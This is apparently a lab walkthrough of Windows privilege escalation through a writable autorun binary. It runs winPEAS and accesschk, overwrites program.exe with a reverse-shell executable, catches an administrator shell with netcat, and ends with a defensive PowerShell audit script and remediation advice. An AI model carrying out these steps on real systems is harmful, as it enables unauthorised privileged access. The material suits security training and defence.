This autorun entry runs with the privileges of whichever user logs in, so to obtain another account's privileges a higher-privileged user has to log in.

Use winPEAS to check the system's autorun executables:

```
C:\PrivEsc\winPEASany.exe quiet applicationsinfo
```
Output:

```
C:\Users\user\Desktop>C:\PrivEsc\winPEASany.exe quiet applicationsinfo
C:\PrivEsc\winPEASany.exe quiet applicationsinfo
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list...
- Creating disabled users list...
- Admin users list...
WinPEAS vBETA VERSION, Please if you find any issue let me know in https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues by carlospolop
[+] Leyend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
[?] You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
====================================(Applications Information)====================================
[+] Current Active Window Application(T1010&T1518)
Select C:\Windows\System32\cmd.exe
[+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518)
[?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
C:\Program Files\Amazon
C:\Program Files\Autorun Program
C:\Program Files\Common Files
C:\Program Files\DACL Service
C:\Program Files\desktop.ini
C:\Program Files\DLL Hijack Service
C:\Program Files\File Permissions Service
C:\Program Files\Insecure Registry Service
C:\Program Files\internet explorer
C:\Program Files\Uninstall Information
C:\Program Files\Unquoted Path Service(Users [AllAccess])
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\windows nt
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
[+] Autorun Applications(T1010)
[?] Check if you can modify other users AutoRuns binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
Folder: C:\Windows\system32
File: C:\Windows\system32\SecurityHealthSystray.exe
RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
=================================================================================================
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]
RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
=================================================================================================
System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
   at System.ThrowHelper.ThrowKeyNotFoundException()
   at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
   at d4.ap()
[+] Scheduled Applications --Non Microsoft--(T1010)
[?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233' or one of its dependencies. The system cannot find the file specified.
File name: 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233'
   at dx.a()
   at d4.ao()
WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].
C:\Users\user\Desktop>
```
Query the registry key whose entries are run automatically at logon:

```
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

Then use accesschk.exe to verify the permissions on each entry:

```
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
```

Output:

```
C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS
C:\Users\user\Desktop>
```
"C:\Program Files\Autorun Program\program.exe" runs automatically at logon, and it is both executable and writable (Everyone and BUILTIN\Users hold FILE_ALL_ACCESS).

Create a backup of the original:

```
copy "C:\Program Files\Autorun Program\program.exe" C:\Temp
```

Output:

```
C:\Users\user\Desktop>copy "C:\Program Files\Autorun Program\program.exe" C:\Temp
copy "C:\Program Files\Autorun Program\program.exe" C:\Temp
        1 file(s) copied.
C:\Users\user\Desktop>
```
Copy the reverse-shell executable, reverse.exe, over the autorun executable:

```
copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
```

Output:

```
C:\Users\user\Desktop>copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
        1 file(s) copied.
C:\Users\user\Desktop>
```
Start a listener on the attacking machine and simulate a user login (the shell comes back with the privileges of whichever user logs in):

```
rdesktop 10.10.163.80
```

Reverse shell:

```
root@ip-10-10-4-200:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.163.80 49760 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
win-qba94kb3iof\admin

C:\Windows\system32>
```
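From the defender's side, the weakness exploited above is an autorun binary whose ACL lets low-privileged principals overwrite it. The following PowerShell audit is an added example (not code from the original write-up, winPEAS or accesschk) that automates the two manual checks, `reg query` on the Run key and `accesschk` on each binary, across all Run/RunOnce entries: it reads each value, extracts the executable path (handling quoted and unquoted command lines), and reports any binary or parent directory on which Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE hold a write-class right. The list of keys beyond HKLM\...\Run, the list of weak principals and the access mask are this example's own assumptions.

```powershell
# Added example (not part of the original write-up): audit Run/RunOnce autorun entries for
# binaries that low-privileged principals can overwrite. Assumes PowerShell 5.1+ on the
# audited host; the extra keys, principal list and access mask below are assumptions.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

# Principals that should never hold write rights on something every logon executes.
# Add 'DOMAIN\Domain Users' in a domain environment.
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Access-mask bits that let a principal replace the file or change who may:
# WriteData, AppendData, WriteExtendedAttributes, WriteAttributes, Delete,
# ChangePermissions, TakeOwnership, plus GENERIC_ALL and GENERIC_WRITE, which some
# ACEs carry unexpanded. FullControl and Modify both include these bits.
$writeMask = 0x2 -bor 0x4 -bor 0x10 -bor 0x100 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-AutorunBinaryPath {
    # Extract the executable path from a Run value such as "C:\Program Files\X\a.exe" /arg.
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted command line: the longest leading run of tokens that names an existing
    # file wins, so a path containing spaces is still recovered.
    $tokens = $cmd -split '\s+'
    for ($i = $tokens.Count; $i -ge 1; $i--) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $tokens[0]
}

function Get-WeakWriteAces {
    # Return the Allow ACEs on $Path that grant a weak principal any write-class right.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { $ace }
    }
}

$findings = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-ItemProperty -Path $key
    foreach ($prop in $item.PSObject.Properties) {
        # Skip the provider metadata properties Get-ItemProperty attaches.
        if ($prop.Name -in @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')) { continue }
        $bin = Get-AutorunBinaryPath -Command ([string]$prop.Value)
        if (-not (Test-Path -LiteralPath $bin -PathType Leaf)) {
            Write-Warning "$key\$($prop.Name): target '$bin' not found"
            continue
        }
        # Check the binary and its directory: delete-and-recreate in a writable
        # directory is as effective as overwriting the file in place.
        foreach ($target in @($bin, (Split-Path -Path $bin -Parent))) {
            foreach ($ace in Get-WeakWriteAces -Path $target) {
                [pscustomobject]@{
                    Key       = $key
                    Value     = $prop.Name
                    Target    = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { 'No autorun binaries writable by low-privileged principals.' }
```

On the host in this write-up the script would list program.exe twice, once for Everyone and once for BUILTIN\Users, each with FullControl. Remediation is to strip those ACEs (for example with `icacls` and `/remove:g`), restore the binary from a known-good copy, and confirm the hash matches the vendor's build; an overwrite of a Run-key binary by a non-administrator is also a strong file-integrity or Sysmon FileCreate (Event ID 11) detection signal.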